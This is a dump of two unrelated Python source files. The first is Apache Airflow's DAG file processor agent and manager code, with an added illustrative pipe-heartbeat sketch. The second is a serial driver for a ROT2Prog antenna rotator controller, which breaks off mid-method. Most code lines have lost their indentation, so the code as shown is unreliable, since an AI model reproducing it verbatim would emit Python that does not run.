def send_sla_callback_request_to_execute(self, full_filepath: str, dag_id: str) -> None:
"""
Sends information about the SLA callback to be executed by DagFileProcessor.
:param full_filepath: DAG File path
:type full_filepath: str
:param dag_id: DAG ID
:type dag_id: str
"""
if not self._parent_signal_conn:
raise ValueError("Process not started.")
try:
request = SlaCallbackRequest(full_filepath=full_filepath, dag_id=dag_id)
self._parent_signal_conn.send(request)
except ConnectionError:
            # If the manager died because of an error, it will be noticed and
            # restarted when harvest_serialized_dags calls _heartbeat_manager.
pass
def wait_until_finished(self) -> None:
"""Waits until DAG parsing is finished."""
if not self._parent_signal_conn:
raise ValueError("Process not started.")
if self._async_mode:
raise RuntimeError("wait_until_finished should only be called in sync_mode")
while self._parent_signal_conn.poll(timeout=None):
try:
result = self._parent_signal_conn.recv()
except EOFError:
return
self._process_message(result)
if isinstance(result, DagParsingStat):
# In sync mode (which is the only time we call this function) we don't send this message from
# the Manager until all the running processors have finished
return
@staticmethod
def _run_processor_manager(
dag_directory: str,
max_runs: int,
processor_timeout: timedelta,
signal_conn: MultiprocessingConnection,
dag_ids: Optional[List[str]],
pickle_dags: bool,
async_mode: bool,
) -> None:
        # Make this process start as a new process group - that makes it easy
        # to kill all of its sub-processes at the OS level, rather than having
        # to iterate over the child processes
os.setpgid(0, 0)
setproctitle("airflow scheduler -- DagFileProcessorManager")
# Reload configurations and settings to avoid collision with parent process.
# Because this process may need custom configurations that cannot be shared,
# e.g. RotatingFileHandler. And it can cause connection corruption if we
# do not recreate the SQLA connection pool.
os.environ['CONFIG_PROCESSOR_MANAGER_LOGGER'] = 'True'
os.environ['AIRFLOW__LOGGING__COLORED_CONSOLE_LOG'] = 'False'
# Replicating the behavior of how logging module was loaded
# in logging_config.py
importlib.reload(import_module(airflow.settings.LOGGING_CLASS_PATH.rsplit('.', 1)[0])) # type: ignore
importlib.reload(airflow.settings)
airflow.settings.initialize()
del os.environ['CONFIG_PROCESSOR_MANAGER_LOGGER']
processor_manager = DagFileProcessorManager(
dag_directory,
max_runs,
processor_timeout,
signal_conn,
dag_ids,
pickle_dags,
async_mode,
)
processor_manager.start()
def heartbeat(self) -> None:
"""Check if the DagFileProcessorManager process is alive, and process any pending messages"""
if not self._parent_signal_conn:
raise ValueError("Process not started.")
# Receive any pending messages before checking if the process has exited.
while self._parent_signal_conn.poll(timeout=0.01):
try:
result = self._parent_signal_conn.recv()
except (EOFError, ConnectionError):
break
self._process_message(result)
# If it died unexpectedly restart the manager process
self._heartbeat_manager()
def _process_message(self, message):
self.log.debug("Received message of type %s", type(message).__name__)
if isinstance(message, DagParsingStat):
self._sync_metadata(message)
else:
raise RuntimeError(f"Unexpected message received of type {type(message).__name__}")
def _heartbeat_manager(self):
"""Heartbeat DAG file processor and restart it if we are not done."""
if not self._parent_signal_conn:
raise ValueError("Process not started.")
if self._process and not self._process.is_alive():
self._process.join(timeout=0)
if not self.done:
self.log.warning(
"DagFileProcessorManager (PID=%d) exited with exit code %d - re-launching",
self._process.pid,
self._process.exitcode,
)
self.start()
if self.done:
return
parsing_stat_age = time.monotonic() - self._last_parsing_stat_received_at
if parsing_stat_age > self._processor_timeout.total_seconds():
Stats.incr('dag_processing.manager_stalls')
self.log.error(
"DagFileProcessorManager (PID=%d) last sent a heartbeat %.2f seconds ago! Restarting it",
self._process.pid,
parsing_stat_age,
)
reap_process_group(self._process.pid, logger=self.log)
self.start()
def _sync_metadata(self, stat):
"""Sync metadata from stat queue and only keep the latest stat."""
self._done = stat.done
self._all_files_processed = stat.all_files_processed
self._last_parsing_stat_received_at = time.monotonic()
@property
def done(self) -> bool:
"""Has DagFileProcessorManager ended?"""
return self._done
@property
def all_files_processed(self):
"""Have all files been processed at least once?"""
return self._all_files_processed
def terminate(self):
"""
Send termination signal to DAG parsing processor manager
and expect it to terminate all DAG file processors.
"""
if self._process and self._process.is_alive():
self.log.info("Sending termination message to manager.")
try:
self._parent_signal_conn.send(DagParsingSignal.TERMINATE_MANAGER)
except ConnectionError:
pass
def end(self):
"""
Terminate (and then kill) the manager process launched.
:return:
"""
if not self._process:
self.log.warning('Ending without manager process.')
return
# Give the Manager some time to cleanly shut down, but not too long, as
# it's better to finish sooner than wait for (non-critical) work to
# finish
self._process.join(timeout=1.0)
reap_process_group(self._process.pid, logger=self.log)
self._parent_signal_conn.close()
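# --- Illustrative sketch, not part of the original module ---
# DagFileProcessorAgent above talks to the manager subprocess over a
# multiprocessing Pipe: the parent polls for pending messages and restarts the
# child if it died. A minimal standalone version of that parent side (names
# and the "stat" payload are made up) could look like this:
def _demo_manager_child(conn):
    conn.send("stat")   # stand-in for a DagParsingStat message
    conn.close()

def _demo_pipe_heartbeat():
    parent_conn, child_conn = multiprocessing.Pipe()
    proc = multiprocessing.Process(target=_demo_manager_child, args=(child_conn,))
    proc.start()
    while parent_conn.poll(timeout=0.5):   # drain any pending messages
        try:
            print(parent_conn.recv())
        except (EOFError, ConnectionError):
            break
    proc.join(timeout=1.0)
    if not proc.is_alive() and proc.exitcode not in (0, None):
        pass   # the real agent re-launches the manager here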
class DagFileProcessorManager(LoggingMixin):
"""
    Given a list of DAG definition files, this kicks off several processors
    in parallel to process them and puts the results on a multiprocessing.Queue
    for DagFileProcessorAgent to harvest. The parallelism is limited and, as the
    processors finish, more are launched. The files are processed over and
    over again, but no more often than the specified interval.
:param dag_directory: Directory where DAG definitions are kept. All
files in file_paths should be under this directory
:type dag_directory: unicode
:param max_runs: The number of times to parse and schedule each file. -1
for unlimited.
:type max_runs: int
:param processor_timeout: How long to wait before timing out a DAG file processor
:type processor_timeout: timedelta
:param signal_conn: connection to communicate signal with processor agent.
:type signal_conn: MultiprocessingConnection
:param dag_ids: if specified, only schedule tasks with these DAG IDs
:type dag_ids: list[str]
:param pickle_dags: whether to pickle DAGs.
:type pickle_dags: bool
:param async_mode: whether to start the manager in async mode
:type async_mode: bool
"""
def __init__(
self,
dag_directory: Union[str, "pathlib.Path"],
max_runs: int,
processor_timeout: timedelta,
signal_conn: MultiprocessingConnection,
dag_ids: Optional[List[str]],
pickle_dags: bool,
async_mode: bool = True,
):
super().__init__()
self._file_paths: List[str] = []
self._file_path_queue: List[str] = []
self._dag_directory = dag_directory
self._max_runs = max_runs
self._signal_conn = signal_conn
self._pickle_dags = pickle_dags
self._dag_ids = dag_ids
self._async_mode = async_mode
self._parsing_start_time: Optional[int] = None
        # Set the signal conn into non-blocking mode, so that attempting to
        # send when the buffer is full errors out, rather than hanging forever
        # while attempting to send (this is to avoid deadlocks!)
#
# Don't do this in sync_mode, as we _need_ the DagParsingStat sent to
# continue the scheduler
if self._async_mode:
os.set_blocking(self._signal_conn.fileno(), False)
self._parallelism = conf.getint('scheduler', 'parsing_processes')
if conf.get('core', 'sql_alchemy_conn').startswith('sqlite') and self._parallelism > 1:
self.log.warning(
"Because we cannot use more than 1 thread (parsing_processes = "
"%d ) when using sqlite. So we set parallelism to 1.",
self._parallelism,
)
self._parallelism = 1
# Parse and schedule each file no faster than this interval.
self._file_process_interval = conf.getint('scheduler', 'min_file_process_interval')
# How often to print out DAG file processing stats to the log. Default to
# 30 seconds.
self.print_stats_interval = conf.getint('scheduler', 'print_stats_interval')
        # How many seconds to wait for a task heartbeat before marking it as a zombie.
self._zombie_threshold_secs = conf.getint('scheduler', 'scheduler_zombie_task_threshold')
        # Whether to store DAG file source code in the database.
self.store_dag_code = STORE_DAG_CODE
# Map from file path to the processor
self._processors: Dict[str, DagFileProcessorProcess] = {}
self._num_run = 0
# Map from file path to stats about the file
self._file_stats: Dict[str, DagFileStat] = {}
self._last_zombie_query_time = None
# Last time that the DAG dir was traversed to look for files
self.last_dag_dir_refresh_time = timezone.make_aware(datetime.fromtimestamp(0))
# Last time stats were printed
self.last_stat_print_time = 0
# TODO: Remove magic number
self._zombie_query_interval = 10
# How long to wait before timing out a process to parse a DAG file
self._processor_timeout = processor_timeout
# How often to scan the DAGs directory for new files. Default to 5 minutes.
self.dag_dir_list_interval = conf.getint('scheduler', 'dag_dir_list_interval')
# Mapping file name and callbacks requests
self._callback_to_execute: Dict[str, List[CallbackRequest]] = defaultdict(list)
self._log = logging.getLogger('airflow.processor_manager')
self.waitables: Dict[Any, Union[MultiprocessingConnection, DagFileProcessorProcess]] = {
self._signal_conn: self._signal_conn,
}
def register_exit_signals(self):
"""Register signals that stop child processes"""
signal.signal(signal.SIGINT, self._exit_gracefully)
signal.signal(signal.SIGTERM, self._exit_gracefully)
# So that we ignore the debug dump signal, making it easier to send
signal.signal(signal.SIGUSR2, signal.SIG_IGN)
def _exit_gracefully(self, signum, frame):
"""Helper method to clean up DAG file processors to avoid leaving orphan processes."""
self.log.info("Exiting gracefully upon receiving signal %s", signum)
self.log.debug("Current Stacktrace is: %s", '\n'.join(map(str, inspect.stack())))
self.terminate()
self.end()
self.log.debug("Finished terminating DAG processors.")
sys.exit(os.EX_OK)
def start(self):
"""
Use multiple processes to parse and generate tasks for the
DAGs in parallel. By processing them in separate processes,
we can get parallelism and isolation from potentially harmful
user code.
"""
self.register_exit_signals()
# Start a new process group
os.setpgid(0, 0)
self.log.info("Processing files using up to %s processes at a time ", self._parallelism)
self.log.info("Process each file at most once every %s seconds", self._file_process_interval)
self.log.info(
"Checking for new files in %s every %s seconds", self._dag_directory, self.dag_dir_list_interval
)
return self._run_parsing_loop()
def _run_parsing_loop(self):
# In sync mode we want timeout=None -- wait forever until a message is received
if self._async_mode:
poll_time = 0.0
else:
poll_time = None
self._refresh_dag_dir()
self.prepare_file_path_queue()
if self._async_mode:
# If we're in async mode, we can start up straight away. If we're
# in sync mode we need to be told to start a "loop"
self.start_new_processes()
while True:
loop_start_time = time.monotonic()
ready = multiprocessing.connection.wait(self.waitables.keys(), timeout=poll_time)
if self._signal_conn in ready:
agent_signal = self._signal_conn.recv()
self.log.debug("Received %s signal from DagFileProcessorAgent", agent_signal)
if agent_signal == DagParsingSignal.TERMINATE_MANAGER:
self.terminate()
break
elif agent_signal == DagParsingSignal.END_MANAGER:
self.end()
sys.exit(os.EX_OK)
elif agent_signal == DagParsingSignal.AGENT_RUN_ONCE:
# continue the loop to parse dags
pass
elif isinstance(agent_signal, CallbackRequest):
self._add_callback_to_queue(agent_signal)
else:
raise ValueError(f"Invalid message {type(agent_signal)}")
if not ready and not self._async_mode:
# In "sync" mode we don't want to parse the DAGs until we
# are told to (as that would open another connection to the
# SQLite DB which isn't a good practice
# This shouldn't happen, as in sync mode poll should block for
# ever. Lets be defensive about that.
self.log.warning(
"wait() unexpectedly returned nothing ready after infinite timeout (%r)!", poll_time
)
continue
for sentinel in ready:
if sentinel is self._signal_conn:
continue
processor = self.waitables.get(sentinel)
if not processor:
continue
self._collect_results_from_processor(processor)
self.waitables.pop(sentinel)
self._processors.pop(processor.file_path)
self._refresh_dag_dir()
self._find_zombies()
self._kill_timed_out_processors()
# Generate more file paths to process if we processed all the files
# already.
if not self._file_path_queue:
self.emit_metrics()
self.prepare_file_path_queue()
self.start_new_processes()
# Update number of loop iteration.
self._num_run += 1
if not self._async_mode:
self.log.debug("Waiting for processors to finish since we're using sqlite")
# Wait until the running DAG processors are finished before
# sending a DagParsingStat message back. This means the Agent
# can tell we've got to the end of this iteration when it sees
# this type of message
self.wait_until_finished()
# Collect anything else that has finished, but don't kick off any more processors
self.collect_results()
self._print_stat()
all_files_processed = all(self.get_last_finish_time(x) is not None for x in self.file_paths)
max_runs_reached = self.max_runs_reached()
try:
self._signal_conn.send(
DagParsingStat(
max_runs_reached,
all_files_processed,
)
)
except BlockingIOError:
# Try again next time around the loop!
                # It is better to fail than to deadlock. This should
# "almost never happen" since the DagParsingStat object is
# small, and in async mode this stat is not actually _required_
# for normal operation (It only drives "max runs")
self.log.debug("BlockingIOError received trying to send DagParsingStat, ignoring")
if max_runs_reached:
self.log.info(
"Exiting dag parsing loop as all files have been processed %s times", self._max_runs
)
break
if self._async_mode:
loop_duration = time.monotonic() - loop_start_time
if loop_duration < 1:
poll_time = 1 - loop_duration
else:
poll_time = 0.0
def _add_callback_to_queue(self, request: CallbackRequest):
self._callback_to_execute[request.full_filepath].append(request)
# Callback has a higher priority over DAG Run scheduling
if request.full_filepath in self._file_path_queue:
# Remove file paths matching request.full_filepath from self._file_path_queue
# Since we are already going to use that filepath to run callback,
# there is no need to have same file path again in the queue
self._file_path_queue = [
file_path for file_path in self._file_path_queue if file_path != request.full_filepath
]
self._file_path_queue.insert(0, request.full_filepath)
def _refresh_dag_dir(self):
"""Refresh file paths from dag dir if we haven't done it for too long."""
now = timezone.utcnow()
elapsed_time_since_refresh = (now - self.last_dag_dir_refresh_time).total_seconds()
if elapsed_time_since_refresh > self.dag_dir_list_interval:
# Build up a list of Python files that could contain DAGs
self.log.info("Searching for files in %s", self._dag_directory)
self._file_paths = list_py_file_paths(self._dag_directory)
self.last_dag_dir_refresh_time = now
self.log.info("There are %s files in %s", len(self._file_paths), self._dag_directory)
self.set_file_paths(self._file_paths)
try:
self.log.debug("Removing old import errors")
self.clear_nonexistent_import_errors()
except Exception:
self.log.exception("Error removing old import errors")
SerializedDagModel.remove_deleted_dags(self._file_paths)
DagModel.deactivate_deleted_dags(self._file_paths)
if self.store_dag_code:
from airflow.models.dagcode import DagCode
DagCode.remove_deleted_code(self._file_paths)
def _print_stat(self):
"""Occasionally print out stats about how fast the files are getting processed"""
if 0 < self.print_stats_interval < time.monotonic() - self.last_stat_print_time:
if self._file_paths:
self._log_file_processing_stats(self._file_paths)
self.last_stat_print_time = time.monotonic()
@provide_session
def clear_nonexistent_import_errors(self, session):
"""
Clears import errors for files that no longer exist.
:param session: session for ORM operations
:type session: sqlalchemy.orm.session.Session
"""
query = session.query(errors.ImportError)
if self._file_paths:
query = query.filter(~errors.ImportError.filename.in_(self._file_paths))
query.delete(synchronize_session='fetch')
session.commit()
def _log_file_processing_stats(self, known_file_paths):
"""
Print out stats about how files are getting processed.
:param known_file_paths: a list of file paths that may contain Airflow
DAG definitions
:type known_file_paths: list[unicode]
:return: None
"""
# File Path: Path to the file containing the DAG definition
# PID: PID associated with the process that's processing the file. May
# be empty.
# Runtime: If the process is currently running, how long it's been
# running for in seconds.
# Last Runtime: If the process ran before, how long did it take to
# finish in seconds
# Last Run: When the file finished processing in the previous run.
headers = ["File Path", "PID", "Runtime", "# DAGs", "# Errors", "Last Runtime", "Last Run"]
rows = []
now = timezone.utcnow()
for file_path in known_file_paths:
last_runtime = self.get_last_runtime(file_path)
num_dags = self.get_last_dag_count(file_path)
num_errors = self.get_last_error_count(file_path)
file_name = os.path.basename(file_path)
file_name = os.path.splitext(file_name)[0].replace(os.sep, '.')
processor_pid = self.get_pid(file_path)
processor_start_time = self.get_start_time(file_path)
runtime = (now - processor_start_time) if processor_start_time else None
last_run = self.get_last_finish_time(file_path)
if last_run:
seconds_ago = (now - last_run).total_seconds()
Stats.gauge(f'dag_processing.last_run.seconds_ago.{file_name}', seconds_ago)
if runtime:
Stats.timing(f'dag_processing.last_duration.{file_name}', runtime)
rows.append((file_path, processor_pid, runtime, num_dags, num_errors, last_runtime, last_run))
# Sort by longest last runtime. (Can't sort None values in python3)
rows = sorted(rows, key=lambda x: x[3] or 0.0)
formatted_rows = []
for file_path, pid, runtime, num_dags, num_errors, last_runtime, last_run in rows:
formatted_rows.append(
(
file_path,
pid,
f"{runtime.total_seconds():.2f}s" if runtime else None,
num_dags,
num_errors,
f"{last_runtime:.2f}s" if last_runtime else None,
last_run.strftime("%Y-%m-%dT%H:%M:%S") if last_run else None,
)
)
log_str = (
"\n"
+ "=" * 80
+ "\n"
+ "DAG File Processing Stats\n\n"
+ tabulate(formatted_rows, headers=headers)
+ "\n"
+ "=" * 80
)
self.log.info(log_str)
def get_pid(self, file_path):
"""
:param file_path: the path to the file that's being processed
:type file_path: unicode
:return: the PID of the process processing the given file or None if
the specified file is not being processed
:rtype: int
"""
if file_path in self._processors:
return self._processors[file_path].pid
return None
def get_all_pids(self):
"""
:return: a list of the PIDs for the processors that are running
:rtype: List[int]
"""
return [x.pid for x in self._processors.values()]
def get_last_runtime(self, file_path):
"""
:param file_path: the path to the file that was processed
:type file_path: unicode
:return: the runtime (in seconds) of the process of the last run, or
None if the file was never processed.
:rtype: float
"""
stat = self._file_stats.get(file_path)
return stat.last_duration if stat else None
def get_last_dag_count(self, file_path):
"""
:param file_path: the path to the file that was processed
:type file_path: unicode
:return: the number of dags loaded from that file, or None if the file
was never processed.
:rtype: int
"""
stat = self._file_stats.get(file_path)
return stat.num_dags if stat else None
def get_last_error_count(self, file_path):
"""
:param file_path: the path to the file that was processed
:type file_path: unicode
:return: the number of import errors from processing, or None if the file
was never processed.
:rtype: int
"""
stat = self._file_stats.get(file_path)
return stat.import_errors if stat else None
def get_last_finish_time(self, file_path):
"""
:param file_path: the path to the file that was processed
:type file_path: unicode
:return: the finish time of the process of the last run, or None if the
file was never processed.
:rtype: datetime
"""
stat = self._file_stats.get(file_path)
return stat.last_finish_time if stat else None
def get_start_time(self, file_path):
"""
:param file_path: the path to the file that's being processed
:type file_path: unicode
:return: the start time of the process that's processing the
specified file or None if the file is not currently being processed
:rtype: datetime
"""
if file_path in self._processors:
return self._processors[file_path].start_time
return None
def get_run_count(self, file_path):
"""
:param file_path: the path to the file that's being processed
:type file_path: unicode
:return: the number of times the given file has been parsed
:rtype: int
"""
stat = self._file_stats.get(file_path)
return stat.run_count if stat else 0
def set_file_paths(self, new_file_paths):
"""
Update this with a new set of paths to DAG definition files.
:param new_file_paths: list of paths to DAG definition files
:type new_file_paths: list[unicode]
:return: None
"""
self._file_paths = new_file_paths
self._file_path_queue = [x for x in self._file_path_queue if x in new_file_paths]
# Stop processors that are working on deleted files
filtered_processors = {}
for file_path, processor in self._processors.items():
if file_path in new_file_paths:
filtered_processors[file_path] = processor
else:
self.log.warning("Stopping processor for %s", file_path)
Stats.decr('dag_processing.processes')
processor.terminate()
self._file_stats.pop(file_path)
self._processors = filtered_processors
def wait_until_finished(self):
"""Sleeps until all the processors are done."""
for processor in self._processors.values():
while not processor.done:
time.sleep(0.1)
def _collect_results_from_processor(self, processor) -> None:
self.log.debug("Processor for %s finished", processor.file_path)
Stats.decr('dag_processing.processes')
last_finish_time = timezone.utcnow()
if processor.result is not None:
num_dags, count_import_errors = processor.result
else:
self.log.error(
"Processor for %s exited with return code %s.", processor.file_path, processor.exit_code
)
count_import_errors = -1
num_dags = 0
stat = DagFileStat(
num_dags=num_dags,
import_errors=count_import_errors,
last_finish_time=last_finish_time,
last_duration=(last_finish_time - processor.start_time).total_seconds(),
run_count=self.get_run_count(processor.file_path) + 1,
)
self._file_stats[processor.file_path] = stat
def collect_results(self) -> None:
"""Collect the result from any finished DAG processors"""
ready = multiprocessing.connection.wait(self.waitables.keys() - [self._signal_conn], timeout=0)
for sentinel in ready:
if sentinel is self._signal_conn:
continue
processor = cast(DagFileProcessorProcess, self.waitables[sentinel])
self.waitables.pop(processor.waitable_handle)
self._processors.pop(processor.file_path)
self._collect_results_from_processor(processor)
self.log.debug("%s/%s DAG parsing processes running", len(self._processors), self._parallelism)
self.log.debug("%s file paths queued for processing", len(self._file_path_queue))
@staticmethod
def _create_process(file_path, pickle_dags, dag_ids, callback_requests):
"""Creates DagFileProcessorProcess instance."""
return DagFileProcessorProcess(
file_path=file_path, pickle_dags=pickle_dags, dag_ids=dag_ids, callback_requests=callback_requests
)
def start_new_processes(self):
"""Start more processors if we have enough slots and files to process"""
while self._parallelism - len(self._processors) > 0 and self._file_path_queue:
file_path = self._file_path_queue.pop(0)
            # Avoid creating a duplicate processor, i.e. one for the same file path
if file_path in self._processors.keys():
continue
callback_to_execute_for_file = self._callback_to_execute[file_path]
processor = self._create_process(
file_path, self._pickle_dags, self._dag_ids, callback_to_execute_for_file
)
del self._callback_to_execute[file_path]
Stats.incr('dag_processing.processes')
processor.start()
self.log.debug("Started a process (PID: %s) to generate tasks for %s", processor.pid, file_path)
self._processors[file_path] = processor
self.waitables[processor.waitable_handle] = processor
def prepare_file_path_queue(self):
"""Generate more file paths to process. Result are saved in _file_path_queue."""
self._parsing_start_time = time.perf_counter()
# If the file path is already being processed, or if a file was
# processed recently, wait until the next batch
file_paths_in_progress = self._processors.keys()
now = timezone.utcnow()
# Sort the file paths by the parsing order mode
list_mode = conf.get("scheduler", "file_parsing_sort_mode")
files_with_mtime = {}
file_paths = []
is_mtime_mode = list_mode == "modified_time"
file_paths_recently_processed = []
for file_path in self._file_paths:
if is_mtime_mode:
files_with_mtime[file_path] = os.path.getmtime(file_path)
file_modified_time = timezone.make_aware(datetime.fromtimestamp(files_with_mtime[file_path]))
else:
file_paths.append(file_path)
file_modified_time = None
# Find file paths that were recently processed to exclude them
# from being added to file_path_queue
# unless they were modified recently and parsing mode is "modified_time"
# in which case we don't honor "self._file_process_interval" (min_file_process_interval)
last_finish_time = self.get_last_finish_time(file_path)
if (
last_finish_time is not None
and (now - last_finish_time).total_seconds() < self._file_process_interval
and not (is_mtime_mode and file_modified_time and (file_modified_time > last_finish_time))
):
file_paths_recently_processed.append(file_path)
# Sort file paths via last modified time
if is_mtime_mode:
file_paths = sorted(files_with_mtime, key=files_with_mtime.get, reverse=True)
elif list_mode == "alphabetical":
file_paths = sorted(file_paths)
elif list_mode == "random_seeded_by_host":
# Shuffle the list seeded by hostname so multiple schedulers can work on different
# set of files. Since we set the seed, the sort order will remain same per host
random.Random(get_hostname()).shuffle(file_paths)
files_paths_at_run_limit = [
file_path for file_path, stat in self._file_stats.items() if stat.run_count == self._max_runs
]
file_paths_to_exclude = set(file_paths_in_progress).union(
file_paths_recently_processed, files_paths_at_run_limit
)
# Do not convert the following list to set as set does not preserve the order
# and we need to maintain the order of file_paths for `[scheduler] file_parsing_sort_mode`
files_paths_to_queue = [
file_path for file_path in file_paths if file_path not in file_paths_to_exclude
]
for file_path, processor in self._processors.items():
self.log.debug(
"File path %s is still being processed (started: %s)",
processor.file_path,
processor.start_time.isoformat(),
)
self.log.debug("Queuing the following files for processing:\n\t%s", "\n\t".join(files_paths_to_queue))
for file_path in files_paths_to_queue:
if file_path not in self._file_stats:
self._file_stats[file_path] = DagFileStat(
num_dags=0, import_errors=0, last_finish_time=None, last_duration=None, run_count=0
)
self._file_path_queue.extend(files_paths_to_queue)
@provide_session
def _find_zombies(self, session):
"""
        Find zombie task instances, i.e. tasks that haven't heartbeated for too
        long, and update the current zombie list.
"""
now = timezone.utcnow()
if (
not self._last_zombie_query_time
or (now - self._last_zombie_query_time).total_seconds() > self._zombie_query_interval
):
# to avoid circular imports
from airflow.jobs.local_task_job import LocalTaskJob as LJ
self.log.info("Finding 'running' jobs without a recent heartbeat")
TI = airflow.models.TaskInstance
DM = airflow.models.DagModel
limit_dttm = timezone.utcnow() - timedelta(seconds=self._zombie_threshold_secs)
self.log.info("Failing jobs without heartbeat after %s", limit_dttm)
zombies = (
session.query(TI, DM.fileloc)
.join(LJ, TI.job_id == LJ.id)
.join(DM, TI.dag_id == DM.dag_id)
.filter(TI.state == State.RUNNING)
.filter(
or_(
LJ.state != State.RUNNING,
LJ.latest_heartbeat < limit_dttm,
)
)
.all()
)
self._last_zombie_query_time = timezone.utcnow()
for ti, file_loc in zombies:
request = TaskCallbackRequest(
full_filepath=file_loc,
simple_task_instance=SimpleTaskInstance(ti),
msg="Detected as zombie",
)
self.log.info("Detected zombie job: %s", request)
self._add_callback_to_queue(request)
Stats.incr('zombies_killed')
def _kill_timed_out_processors(self):
"""Kill any file processors that timeout to defend against process hangs."""
now = timezone.utcnow()
for file_path, processor in self._processors.items():
duration = now - processor.start_time
if duration > self._processor_timeout:
self.log.error(
"Processor for %s with PID %s started at %s has timed out, killing it.",
file_path,
processor.pid,
processor.start_time.isoformat(),
)
Stats.decr('dag_processing.processes')
Stats.incr('dag_processing.processor_timeouts')
# TODO: Remove after Airflow 2.0
Stats.incr('dag_file_processor_timeouts')
processor.kill()
def max_runs_reached(self):
""":return: whether all file paths have been processed max_runs times"""
if self._max_runs == -1: # Unlimited runs.
return False
for stat in self._file_stats.values():
if stat.run_count < self._max_runs:
return False
if self._num_run < self._max_runs:
return False
return True
def terminate(self):
"""
Stops all running processors
:return: None
"""
for processor in self._processors.values():
Stats.decr('dag_processing.processes')
processor.terminate()
def end(self):
"""
Kill all child processes on exit since we don't want to leave
them orphaned.
"""
pids_to_kill = self.get_all_pids()
if pids_to_kill:
kill_child_processes_by_pids(pids_to_kill)
def emit_metrics(self):
"""
Emit metrics about dag parsing summary
This is called once every time around the parsing "loop" - i.e. after
all files have been parsed.
"""
parse_time = time.perf_counter() - self._parsing_start_time
Stats.gauge('dag_processing.total_parse_time', parse_time)
Stats.gauge('dagbag_size', sum(stat.num_dags for stat in self._file_stats.values()))
Stats.gauge(
'dag_processing.import_errors', sum(stat.import_errors for stat in self._file_stats.values())
)
@property
def file_paths(self):
return self._file_paths
|
rot2prog.py
|
"""This is a python interface to the Alfa ROT2Prog Controller.
"""
import logging
import serial
import time
from threading import Lock, Thread
class ReadTimeout(Exception):
"""A serial read timed out.
"""
pass
class PacketError(Exception):
"""A received packet contained an error.
"""
pass
class ROT2Prog:
"""Sends commands and receives responses from the ROT2Prog controller.
"""
_log = logging.getLogger(__name__)
_ser = None
_pulses_per_degree_lock = Lock()
_pulses_per_degree = 1
_limits_lock = Lock()
def __init__(self, port, timeout = 5):
"""Creates object and opens serial connection.
Args:
port (str): Name of serial port to connect to.
timeout (int, optional): Maximum response time from the controller.
"""
# open serial port
self._ser = serial.Serial(
port = port,
baudrate = 600,
bytesize = 8,
parity = 'N',
stopbits = 1,
timeout = timeout,
inter_byte_timeout = 0.1) # inter_byte_timeout allows continued operation after a bad packet
self._log.debug('\'' + str(self._ser.name) + '\' opened with ' + str(timeout) + "s timeout")
# get resolution from controller
self.status()
# set the limits to default values
self.set_limits()
def _send_command(self, command_packet):
"""Sends a command packet.
Args:
command_packet (list of int): Command packet queued.
"""
self._ser.write(bytearray(command_packet))
self._log.debug('Command packet sent: ' + str(list(map(hex, list(command_packet)))))
def _recv_response(self):
"""Receives a response packet.
Returns:
az (float), el (float): Tuple of current azimuth and elevation.
Raises:
PacketError: The response packet is incomplete or contains bad values.
ReadTimeout: The controller was unresponsive.
"""
# read with timeout
response_packet = list(self._ser.read(12))
# attempt to receive 12 bytes, the length of response packet
self._log.debug('Response packet received: ' + str(list(map(hex, list(response_packet)))))
if len(response_packet) != 12:
if len(response_packet) == 0:
raise ReadTimeout('Response timed out')
else:
raise PacketError('Incomplete response packet')
else:
# convert from byte values
az = (response_packet[1] * 100) + (response_packet[2] * 10) + response_packet[3] + (response_packet[4] / 10.0) - 360.0
el = (response_packet[6] * 100) + (response_packet[7] * 10) + response_packet[8] + (response_packet[9] / 10.0) - 360.0
PH = response_packet[5]
PV = response_packet[10]
az = float(round(az, 1))
el = float(round(el, 1))
# check resolution value
valid_pulses_per_degree = [1, 2, 4]
if PH != PV or PH not in valid_pulses_per_degree:
raise PacketError('Invalid controller resolution received (PH = ' + str(PH) + ', PV = ' + str(PV) + ')')
else:
with self._pulses_per_degree_lock:
self._pulses_per_degree = PH
self._log.debug('Received response')
self._log.debug('-> Azimuth: ' + str(az) + '°')
self._log.debug('-> Elevation: ' + str(el) + '°')
self._log.debug('-> PH: ' + str(PH))
self._log.debug('-> PV: ' + str(PV))
return (az, el)
def stop(self):
"""Sends a stop command to stop the rotator in the current position.
Returns:
az (float), el (float): Tuple of current azimuth and elevation.
"""
self._log.debug('Stop command queued')
cmd = [0x57, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0f, 0x20]
self._send_command(cmd)
return self._recv_response()
def status(self):
"""Sends a status command to determine the current position of the rotator.
Returns:
az (float), el (float): Tuple of current azimuth and elevation.
"""
self._log.debug('Status command queued')
cmd = [0x57, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x1f, 0x20]
self._send_command(cmd)
return self._recv_response()
def set(self, az, el):
"""Sends a set command to turn the rotator to the specified position.
Args:
az (float): Azimuth angle to turn rotator to.
el (float): Elevation angle to turn rotator to.
Raises:
ValueError: The inputs cannot be sent to the controller.
"""
# make sure the inputs are within limits
az = float(az)
el = float(el)
with self._limits_lock:
if az > self._max_az or az < self._min_az:
raise ValueError('Azimuth of ' + str(az) + '° is out of range [' + str(self._min_az) + '°, ' + str(self._max_az) + '°]')
if el > self._max_el or el < self._min_el:
raise ValueError('Elevation of ' + str(el) + '° is out of range [' + str(self._min_el) + '°, ' + str(self._max_el) + '°]')
self._log.debug('Set command queued')
self._log.debug('-> Azimuth: ' + str(az) + '°')
self._log.debug('-> Elevation: ' + str(el) + '°')
# encode with resolution
with self._pulses_per_degree_lock:
resolution = self._pulses_per_degree
H = int(resolution * (float(az) + 360))
V = int(resolution * (float(el) + 360))
# convert to ascii characters
H = "0000" + str(H)
V = "0000" + str(V)
# build command
cmd = [
0x57,
int(H[-4]) + 0x30, int(H[-3]) + 0x30, int(H[-2]) + 0x30, int(H[-1]) + 0x30,
resolution,
int(V[-4]) + 0x30, int(V[-3]) + 0x30, int(V[-2]) + 0x30, int(V[-1]) + 0x30,
resolution,
0x2f,
0x20]
self._send_command(cmd)
def get_limits(self):
"""Returns the minimum and maximum limits for azimuth and elevation.
Returns:
min_az (float), max_az (float), min_el (float), max_el (float): Tuple of minimum and maximum azimuth and elevation.
"""
with self._limits_lock:
return (self._min_az, self._max_az, self._min_el, self._max_el)
def set_limits(self, min_az = -180, max_az = 540, min_el = -21, max_el = 180):
"""Sets the minimum and maximum limits for azimuth and elevation.
Args:
min_az (int, optional): Minimum azimuth. Defaults to -180.
max_az (int, optional): Maximum azimuth. Defaults to 540.
